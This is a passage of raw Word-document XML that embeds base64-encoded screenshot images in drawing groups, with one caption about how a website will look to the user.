RyySR+ZH/1&#10;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BUjAXFIEAACdDwAADgAA&#10;AAAAAAAAAAAAAAA9AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEA0bCAXBnyAAAZ8gAA&#10;FAAAAAAAAAAAAAAAAAC7BgAAZHJzL21lZGlhL2ltYWdlMS5qcGdQSwECLQAUAAYACAAAACEAFtlx&#10;Nt0AAAAFAQAADwAAAAAAAAAAAAAAAAAG+QAAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAh&#10;ADedwRi6AAAAIQEAABkAAAAAAAAAAAAAAAAAEPoAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQ&#10;SwUGAAAAAAYABgB8AQAAAfsAAAAA&#10;">
                <v:rect id="Rectangle 4376" o:spid="_x0000_s1299" style="position:absolute;left:59192;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262C156F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 4377" o:spid="_x0000_s1300" style="position:absolute;left:4315;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0CDCE49" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 4378" o:spid="_x0000_s1301" style="position:absolute;left:4315;top:36036;width:37342;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6CDDE29" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>For the user how the website will look like</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 4379" o:spid="_x0000_s1302" style="position:absolute;left:32424;top:3603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66D9EE29" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 4390" o:spid="_x0000_s1303"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5nQwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE89b8Iw&#10;EN0r9T9YV4mtOIFSIMVBgETJ2NIOjCf7SKLG5yg2JO2vxwNSx6f3vVoPthFX6nztWEE6TkAQa2dq&#10;LhV8f+2fFyB8QDbYOCYFv+RhnT8+rDAzrudPuh5DKWII+wwVVCG0mZReV2TRj11LHLmz6yyGCLtS&#10;mg77GG4bOUmSV2mx5thQYUu7ivTP8WIVDCf98begc3PYUvFeGj1P69lcqdHTsHkDEWgI/+K7uzAK&#10;XqbLuD++iU9A5jcAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAwteZ0MMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
                  <v:imagedata r:id="rId100" o:title=""/>
                </v:shape>
                <v:shape id="Shape 4391" o:spid="_x0000_s1304"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PsxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gq96SZGxEY3UtpaerSxULw9ss8kJPs2ZLdJ/PfdguBxmJlvmN1+Mq0YqHe1ZQXxIgJB&#10;XFhdc6ng+3SYb0A4j6yxtUwKruRgnz3MdphqO/IXDbkvRYCwS1FB5X2XSumKigy6he2Ig3exvUEf&#10;ZF9K3eMY4KaVyyhaS4M1h4UKO3qtqGjyX6PgfVz++PPxo9nEF6u7VfnGyfGk1NPj9LIF4Wny9/Ct&#10;/akVrJLnGP7fhCcgsz8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA8Hoz7MYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC68D9A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="-777"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D6B5E45" wp14:editId="0B0C5064">
                <wp:extent cx="5986577" cy="3772557"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="43519" name="Group 43519"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986577" cy="3772557"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986577" cy="3772557"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="4380" name="Rectangle 4380"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3256073"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7CEB0711"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4381" name="Rectangle 4381"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="457149" y="3420665"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0E318D87"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4382" name="Rectangle 4382"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3623356"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="44D0DD7B"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4393" name="Picture 4393"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId101"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="12700"/>
                            <a:ext cx="5873750" cy="3305810"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="4394" name="Shape 4394"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="25603" y="0"/>
                            <a:ext cx="5899150" cy="3331210"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5899150" h="3331210">
                                <a:moveTo>
                                  <a:pt x="0" y="3331210"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5899150" y="3331210"/>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6B5E45" id="Group 43519" o:spid="_x0000_s1305" style="width:471.4pt;height:297.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59865,37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TfScLAQAAMUNAAAOAAAAZHJzL2Uyb0RvYy54bWzcV21v2zYQ/j5g&#10;/0HQ98Z6tWwhTjE0a1BgWIO+/ACapixhFEmQ9Ev263d3lGQ3Tpc1A7piASJT4vH43HPHu+P162Mv&#10;o72wrtNqFadXSRwJxfWmU9tV/PnT21eLOHKeqQ2TWolV/CBc/Prm55+uD6YWmW613AgbgRLl6oNZ&#10;xa33pp7NHG9Fz9yVNkLBZKNtzzy82u1sY9kBtPdyliXJfHbQdmOs5sI5+HobJuMb0t80gvv3TeOE&#10;j+QqBmyenpaea3zObq5ZvbXMtB0fYLAXoOhZp2DTSdUt8yza2e5CVd9xq51u/BXX/Uw3TccF2QDW&#10;pMkja+6s3hmyZVsftmaiCah9xNOL1fLf93fWfDT3Fpg4mC1wQW9oy7GxPf4CyuhIlD1MlImjjzh8&#10;LJeLeVlVccRhLq+qrCyrQCpvgfmLdbz99ZmVs3Hj2RdwDgYCxJ04cP+Og48tM4KodTVwcG+jbrOK&#10;i3wBQaJYD5H6AWKHqa0UEX0lekh2IsvVDnh7gqlyWRSLDDQhJ1k5T6o8cDKxVpY5HAzkLF0uinyO&#10;05PhrDbW+Tuh+wgHq9gCFIoutv/N+SA6iuD2UuFT6bedlGEWvwB/I0Ic+eP6SEameYnb4be13jyA&#10;6a22f76HQ9xIfVjFehjFeK5hd5yNI/lOAeV4hMaBHQfrcWC9fKPpoAU8v+y8bjoCfNptAAa+DBi+&#10;h1PTJ52ajjRAADzv1KKs0mIZfFpkyXxOLLL6B/EphdCJ5f+/T7MnfZp9k0+HIzrP8rwkAs/duSzy&#10;/+6IUhL9EdxpOl7D/1B7YHSRd5+v0bDK76yIByX9P9LRM/vHzryCMmmY79ad7PwDlXzIhAhK7e87&#10;jukXX85T+BLcFlI4COC+kMDhG6S8URLXYZ7E9y/UrGVnMIli+sLxABj6hUf19gmbQy2/1XzXC+VD&#10;c2KFBOxaubYzLo5sLfq1gDpj320o+bDaeSs8b3HDBjbGohMy+DRBKE/AEPNXyk6+yBOwHYtKViVD&#10;bzOlp0WVVyUEPBXqPCkXKUm8tOoQrACEhoDru+XzZTF6mMo4+rf4pnOPNTkwdcHScpmeWMrT7IIl&#10;vgu1GV021mPo+zahMsO3dhzxoxqHWMH/tgWFGMd1qBSHEdThcjFgaaGLyAMUnO+hQH/SJOlP/dUo&#10;EaLnJCPVueykEzuTQWdYMcqNv4Z0n8uP4TJKjL9BMqTSxzJcaifCBmgWNTmTqRB652RKhVZnZQGh&#10;G3EGl4EGTg/1PdAHq82I86Kzcf5BCuRDqg+igR4H+tKU1jm7Xb+RNtoz7EroD+MENiZRXBNO3bAq&#10;+eoqFGXStGzQNagZNiCVgyaUFHTzmMAMavmAJlw/oIkHO8dLCECaFhEsrfy0XsHViTbEgjBYe6oN&#10;aBC+UUdFTTPcFQjRcK/By8j5O8mfbl83fwEAAP//AwBQSwMECgAAAAAAAAAhAIWZDlS88AAAvPAA&#10;ABQAAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ//Y/+AAEEpGSUYAAQEBA